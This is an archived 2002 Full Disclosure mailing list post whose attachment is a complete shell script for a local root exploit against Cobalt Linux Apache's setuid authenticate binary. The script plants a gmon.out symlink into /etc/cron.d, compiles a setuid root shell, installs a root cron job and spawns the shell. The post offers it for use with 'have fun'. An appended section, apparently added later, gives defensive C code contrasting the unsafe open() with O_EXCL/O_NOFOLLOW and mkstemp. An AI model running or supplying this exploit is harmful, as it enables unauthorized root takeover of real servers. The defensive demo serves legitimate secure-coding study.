Full Disclosure mailing list archives
Cobalt Linux Apache Local Root Exploit
From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Tue, 20 Aug 2002 14:33:47 -0600
I've been sitting on this a while but what the hell... have fun.

peace,
core

-- 
Charles Stevenson (core) <core () bokeoa com>
Lab Assistant, College of Eastern Utah San Juan Campus
http://www.bokeoa.com/~core/core.asc

Attachment: RaQFuCK.sh

#!/bin/sh
#
# Cobalt Linux 6.0 Local Root Exploit
#
# Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
# Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
#
# Problem Source Code:
# fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
#
# Suggested Code:
# fd = mkstemp("/tmp/gmon.out-XXXXXX");
#
# Still need help Cobalt developers? Ok:
# man 3 tmpfile; man 2 open; echo "Thanks core"
#
# by Charles Stevenson <core () bokeoa com>
#
# Fri Jun 28 03:35:53 MDT 2002
# - initial version
# Sun Jul 7 20:12:41 MDT 2002
# - added some features for robustness

echo "RaQFuCK.sh by core"

target="/usr/lib/authenticate"
tempdir="/tmp"

if [ -u /.sushi ] ; then
  exec /.sushi
fi

printf "Checking for $target..."
if [ -f "$target" ] ; then
  echo "done."
else
  echo "NO!"
  exit 1
fi

printf "Checking if $target is setuid root..."
if [ -u "$target" ] ; then
  echo "done."
else
  echo "NO! Hrm... does this admin have a clue???"
  exit 1
fi

if [ ! -d "$tempdir/core" ]; then
  printf "Creating $tempdir/core..."
  if ! mkdir "$tempdir/core" 2>/dev/null ; then
    echo "FAILED!" ; exit 1
  fi
  echo "done."
fi

printf "Changing directory to $tempdir/core..."
if ! cd "$tempdir/core" 2>/dev/null ; then
  echo "FAILED!" ; exit 1
else
  echo "done."
fi

printf "Creating cron.d symlink..."
if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
  echo "FAILED!" ; exit 1
else
  echo "done."
fi

printf "Changing umask..."
if ! umask 000 ; then
  echo "FAILED!" ; exit 1
else
  echo "done."
fi

printf "Compiling root shell..."
cat >sushi.c <<EOF
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
  setuid(0);
  setgid(0);
  execve("/bin/sh",argv,envp);
  return -1;
}
EOF
if ! cc sushi.c -o sushi 2>/dev/null; then
  echo "FAILED!" ; exit 1
else
  echo "done."
fi

printf "Compiling cron takeover..."
cat >takeover.c <<EOF
#include <stdlib.h>
main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
EOF
if ! cc takeover.c -o own 2>/dev/null; then
  echo "FAILED!" ; exit 1
fi
echo "done."

printf "Performing symlink attack..."
printf "\n\n\n\n" | "$target"
if [ -u /etc/cron.d/core ] ; then
  echo "SYMLINK ATTACK FAILED!" && exit 1
else
  echo "done."
fi

printf "Setting up evil cron job..."
cat >croncore <<EOF
*/1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi
EOF
if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
  echo "FAILED!" ; exit 1
else
  echo "done."
fi

printf "Waiting for root shell"
while [ ! -u /.sushi ] ; do
  sleep 1 ; printf "."
done
echo "done."

cd /

printf "Cleaning up real quick..."
if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
  echo "FAILED??? Fuck it!"
else
  echo "done."
fi

echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
if ! exec /.sushi -i; then
  echo "Exec Failed!!! BUMMER!" ; exit 1
fi
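The root cause named in the script header is a privileged program opening a fixed filename with O_CREAT|O_TRUNC and no O_EXCL or O_NOFOLLOW, so a symlink planted at that name redirects the write. The following is an added example, not code from the post or from Cobalt: it puts that open() beside two hardened openers (O_EXCL|O_NOFOLLOW, and the mkstemp variant the header suggests) and checks in a private scratch directory under /tmp which of them follow a planted link; the function names and the scratch path are my own.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The advisory's problem line: a fixed name opened O_CREAT|O_TRUNC without
 * O_EXCL/O_NOFOLLOW. A symlink planted at `path` redirects the (root) write. */
int open_profile_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened open: O_NOFOLLOW rejects a symlink as the final component (ELOOP),
 * O_EXCL rejects any pre-existing path (EEXIST); mode 0600 instead of 0666. */
int open_profile_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* The advisory's suggested fix: mkstemp picks an unpredictable name and
 * creates it atomically with O_EXCL and mode 0600. `out` gets the path. */
int open_profile_mkstemp(const char *dir, char *out, size_t outlen) {
    if (snprintf(out, outlen, "%s/gmon.out-XXXXXX", dir) >= (int)outlen)
        return -1;
    return mkstemp(out);
}

/* Self-check in a scratch dir: plant "gmon.out" -> "victim" and confirm the
 * hardened openers refuse it while the original pattern follows and truncates. */
int demo_symlink_is_refused(void) {
    char dir[] = "/tmp/gmon-demo-XXXXXX", victim[64], link[64], tmp[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/gmon.out", dir);
    int fd = open(victim, O_WRONLY | O_CREAT, 0600);          /* constructed victim */
    if (fd < 0 || write(fd, "secret", 6) != 6 || symlink(victim, link) != 0) return 0;
    close(fd);
    int ok = open_profile_safe(link) == -1;                    /* link refused      */
    fd = open_profile_mkstemp(dir, tmp, sizeof tmp);
    ok = ok && fd >= 0 && strcmp(tmp, link) != 0;              /* unpredictable name */
    if (fd >= 0) { close(fd); unlink(tmp); }
    struct stat st;
    fd = open_profile_unsafe(link);                            /* follows the link  */
    ok = ok && fd >= 0 && fstat(fd, &st) == 0 && st.st_size == 0; /* victim emptied */
    if (fd >= 0) close(fd);
    unlink(link); unlink(victim); rmdir(dir);
    return ok;
}
```

The same check is what a code reviewer applies to any setuid binary that writes to a predictable path: the privileged side must use O_EXCL/O_NOFOLLOW or mkstemp, not rely on the directory being trustworthy.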